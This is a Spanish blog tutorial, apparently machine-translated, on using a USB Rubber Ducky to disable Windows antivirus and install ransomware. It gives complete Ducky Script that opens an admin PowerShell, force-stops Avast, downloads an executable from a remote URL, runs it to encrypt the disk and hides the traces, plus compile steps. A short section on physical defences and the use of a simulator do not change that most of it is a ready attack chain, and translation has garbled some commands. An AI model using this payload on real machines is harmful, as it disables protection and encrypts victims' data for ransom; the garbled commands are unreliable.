BlogUSB Rubber Ducky

Cómo: usar el patito de goma USB para deshabilitar el software antivirus e instalar ransomware

El ransomware es un software que cifra todo el disco duro de la víctima, bloqueando el acceso a sus archivos a menos que pague un rescate al atacante para obtener la clave de descifrado. En este tutorial, aprenderá lo fácil que es usar el patito de goma USB, que está disfrazado de una unidad flash ordinaria, para implementar ransomware en la computadora de una víctima en cuestión de segundos. Con un ataque que solo toma un momento, necesitarás saber cómo defenderte.

El patito de goma USB

Para entregar el ransomware a una computadora de destino, usaremos el Patito de goma USB. En pocas palabras, el USB Rubber Ducky es un dispositivo deshonesto desarrollado por Hak5 que utiliza la inyección de pulsaciones de teclas para engañar a la computadora de destino haciéndole creer que es un teclado, luego procede a escribir automáticamente la secuencia de teclas programada en su carga útil. Esto aprovecha la confianza inherente que los sistemas operativos tienen en los dispositivos de interfaz humana (HID).

Si no ha usado el USB Rubber Ducky antes, le recomiendo que lo pruebe. Es bastante simple y fácil de aprender rápidamente, lo que lo hace ideal para piratas informáticos principiantes. Para obtener un resumen completo sobre cómo usarlo, consulte los artículos de SADMIN, que le brindan instrucciones detalladas sobre cómo crear y entregar cargas útiles.

El interior de un patito de goma USB. Imagen de SADMIN / Null Byte

Paso 1: uso de algunos comandos simples de PowerShell

En este tutorial, elegí diseñar una carga útil que se dirija a las computadoras que ejecutan un sistema operativo Windows, ya que sigue siendo el sistema operativo más popular que existe. Para aprovechar la rápida velocidad de escritura del Rubber Ducky, vamos a escribir y ejecutar comandos desde una terminal.

Muchos de ustedes que están ejecutando un sistema operativo Windows sin duda están familiarizados con la línea de comandos. Sin embargo, la verdad es que la línea de comandos es básicamente DOS, que es un sistema operativo que se creó en 1981 y no se ha actualizado desde 2000.

Como tal, esto lo hace ridículamente desactualizado y un terminal de shell inadecuado para propósitos más avanzados o específicos. En su lugar, usaremos PowerShell, que se ha implementado en todas las versiones de escritorio de Windows desde Windows 7. Esto lo convierte en una plataforma mucho mejor para montar un ataque con Rubber Ducky.

Al diseñar nuestra carga útil, hay algunos comandos de PowerShell que son particularmente útiles para nosotros. Por ejemplo get-service “nombre_servicio” proporciona el estado de un servicio específico en ejecución, si excluye un nombre y simplemente escribe obtener-servicio, se mostrará una tabla de todos los servicios del sistema.

A continuación, vamos a querer usar el comando stop-service -force “nombre_servicio” que detiene el servicio definido entre comillas. Para deshabilitar un software antivirus específico, puede buscar el nombre del servicio en la tabla get-service y luego usarlo en este comando. Añadiendo el -fuerza forzará la detención del servicio. Bastante autoexplicativo, ¿verdad?

Aquí se muestra el terminal de PowerShell con la tabla de servicio del sistema.

Para ejecutar una carga útil, necesitamos la capacidad de descargar archivos de Internet. Para hacer esto en PowerShell, usaremos la aproximación de Windows de “wget” de Linux. Para la mayoría de las versiones de PowerShell, el comando para esto se ve a continuación.

Invoke-WebRequest -Uri “http: //www.webpage.domain/file” -OutFile “C: ruta archivo”

Donde el primer argumento es la ubicación web del archivo y el segundo argumento es la carpeta de destino. Después de ejecutar este comando, debemos esperar unos segundos para que se complete la descarga antes de poder abrir el archivo. Finalmente, para abrir un archivo desde la terminal, solo necesitamos escribir la ruta del archivo en PowerShell y presionar ingresar.

Paso 2: deshabilitar el software antivirus con Ducky Script

Ahora que conocemos los comandos de PowerShell que vamos a usar, es hora de implementarlos en Ducky Script, que es el lenguaje que usamos para programar el USB Rubber Ducky. La primera parte de nuestro script deshabilita el software antivirus activo. Elegí separar esta parte del script en su propio paso porque deshabilitar el software antivirus abre la puerta a muchas posibilidades divertidas y emocionantes. Puede reutilizar esta sección de código para otras aplicaciones.

En el caso de mi máquina de destino elegida, estoy deshabilitando Avast! Antivirus. Sin embargo, esto se puede aplicar a cualquier software antivirus. Solo asegúrese de buscar el nombre del servicio escribiendo el obtener-servicio en PowerShell para ajustar el antivirus al que quiera apuntar.

A continuación, puedes ver la primera parte de mi guión de Ducky.

RETRASO 300
GUI s
RETRASO 300
STRING powershell
RETRASO 500
CTRL-MAYÚS ENTRAR
RETRASO 500
STRING obtener-servicio
INGRESAR
RETRASO 750
STRING stop-service -force “avast! Antivirus”
INGRESAR
RETRASO 750
INGRESAR
RETRASO 500
STRING get-service “avast! Antivirus”
INGRESAR

Algunas cosas a tener en cuenta aquí. GUI + S presionará la tecla de Windows y el S clave, abriendo una consulta de búsqueda. CONTROL + CAMBIO + INGRESAR es el acceso directo para abrir una aplicación en modo administrador, que es necesario para activar y desactivar servicios desde el terminal.

El adicional INGRESAR tecla que se presiona después stop-service -force “avast! antivirus” está ahí porque Avast abre inmediatamente un mensaje de confirmación como medida de seguridad. Es posible que esta sección del script deba personalizarse para tener en cuenta cómo reacciona su software específico al comando stop-service.

Avast! Antivirus desactivado después de ejecutar el comando stop-service.

Paso 3: descarga e instalación de ShinoLocker en Ducky Script

Ahora que tenemos un código que puede detener el software antivirus en la computadora del objetivo, podemos descargar e instalar el ransomware. Cuando se ejecuta el ejecutable, todos los archivos del usuario se cifran y, por lo tanto, se vuelven inaccesibles para cualquiera que no tenga la clave.

Por razones éticas, en este tutorial, usaremos ShinoLocker, que es un simulador de ransomware que proporciona inmediatamente al usuario un enlace a la clave que le permitirá descifrar sus archivos una vez que haya terminado de ejecutarse. ShinoLocker fue creado por Shota Shinogi, quien también creó el simulador ShinoBot RAT que presentamos en otro artículo.

Advertencia justa: si no sabe lo que está haciendo y prueba esto en su propia máquina, puede perder todos sus archivos, especialmente si está usando algo que no sea ShinoLocker. Si desea probar esto, hágalo en una máquina virtual. Además, no soy responsable de ninguna pérdida de datos personales, así que hágalo bajo su propio riesgo.

A continuación, vemos la parte de nuestro Ducky Script para implementar ShinoLocker.

RETRASO 500

STRING Invoke-WebRequest -Uri “https://github.com/blackslash-wht/Rubber-Ducky-Install-Ransomware/raw/master/ShinoLockerMSWindowsBuild.exe“-OutFile” c: Temp sl.exe “

RETRASO 500
INGRESAR
RETRASO 3000
STRING c: Temp sl.exe
RETRASO 500
INGRESAR
ALT F4
RETRASO 100
STRING salida
RETRASO 100
INGRESAR
GUI d

Esta sección de Ducky Script es bastante fácil de discernir. Descarga ShinoLocker y ejecuta el archivo ejecutable, encriptando inmediatamente todos los archivos en el disco duro. Las siguientes teclas simplemente cierran las ventanas abiertas y muestran el escritorio, ocultando los rastros inmediatos de nuestra presencia.

Una última cosa a tener en cuenta es el tiempo asociado con el guión. El DEMORA norte el comando esperará norte número de milisegundos. Es posible que estos números deban ajustarse según la capacidad de RAM de la máquina de destino y la velocidad de conexión a Internet. Es importante lograr un equilibrio entre darle tiempo al Ducky para entregar su carga útil y brevedad en la ejecución.

Descarga de ShinoLocker; archivos vulnerables a punto de ser cifrados.

Paso 4: reunirlo todo y compilar la carga útil

Para terminar, agregue los dos segmentos del Ducky Script de los pasos 2 y 3 juntos en un archivo TXT. Cuando se crea ese archivo de texto, necesitamos compilar ese archivo en código de máquina. Nuestros amigos de Hak5 han hecho de esta una tarea fácil con un compilador personalizado y fácil de usar en forma de archivo JAR que construirá nuestra carga útil en un abrir y cerrar de ojos.

Para compilar su Ducky Script desde una terminal, CD al directorio en el que se encuentra su archivo duckencoder.JAR (o especifique la ruta completa en el comando) y escriba java -jar duckencoder.jar -i “archivo de entrada.txt” -o “d: inject.bin”. Tenga en cuenta que su carpeta de destino debe ser su tarjeta microSD, en mi caso, la letra de unidad D, y el archivo de salida debe llamarse inject.BIN. Una vez que haya cargado el archivo binario en la tarjeta microSD, insértelo en su Rubber Ducky y estará listo para comenzar.

Así es como se compila Ducky Script usando PowerShell. Aquí también puede ver los archivos de entrada y salida.

Paso 5: protección contra este ataque

Con la tarjeta SD cargada, el USB Rubber Ducky está listo para hacerse cargo de cualquier sistema Windows al que esté conectado con ransomware. Si bien el nuestro es una simulación, un atacante real podría usar las mismas técnicas. Para protegerse de este tipo de ataques, asegúrese de tomar siempre precauciones de sentido común cuando se trata de dejar su computadora cerca. Nunca deje su computadora desatendida sin bloquearla primero, y nunca conecte unidades USB si no sabe de dónde provienen.

Muchas empresas dejan los puertos USB expuestos hacia los clientes e invitados y, a menudo, los recepcionistas u otro personal de oficina dejan sus estaciones de trabajo desatendidas. Errores como estos pueden hacer que se pierdan o se retengan datos comerciales críticos para obtener un rescate. Es importante recordar que su computadora no puede diferenciar este dispositivo de usted, por lo que debe bloquear su computadora antes de dejarla si desea que siga siendo suya.

¿Te diste el gatillo y conectaste el Ducky a tu computadora con Windows? Si es así, es posible que tenga dificultades para ver sus archivos, ya que el cifrado AES de 128 bits hará que cualquier cosa sea difícil de leer. Si lo hizo, no se asuste. Shota es un buen hacker y su ShinoLocker te proporcionará la clave de desbloqueo. Mire el video a continuación para ver el proceso de ejecución y luego desbloquear ShinoLocker, si tiene curiosidad sobre cómo se ve o necesita desbloquear su propia computadora.

Si no lo vio en el video, haga clic en el enlace “ShinoLocker Server” y (si no se completa automáticamente) ingrese su ID de host y su ID de transacción. Se le presentará la clave, que puede copiar y pegar en ShinoLocker para descifrar sus archivos y desinstalar el programa.

Ultimas palabras

Espero que este tutorial le haya abierto los ojos al hecho de que el USB Rubber Ducky no solo es rápido y fácil de implementar, sino que también es especialmente peligroso cuando se combina con malware como ransomware. Con esta simulación, puede ver por sí mismo por qué es fundamental mantener su computadora desbloqueada bajo su control físico en todo momento.

Para obtener más detalles sobre este ataque específico, no dude en consultar el Repositorio de GitHub para este tutorial, donde puede encontrar el archivo de texto Ducky Script, el archivo inject.BIN de carga útil precompilado y una compilación de Windows de ShinoLocker. ¡Feliz pirateo, y recuerda usar tus poderes solo para el bien!

Foto de portada y capturas de pantalla de Barra negra/ Byte nulo

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Mira también
Cerrar
Botón volver arriba
Cerrar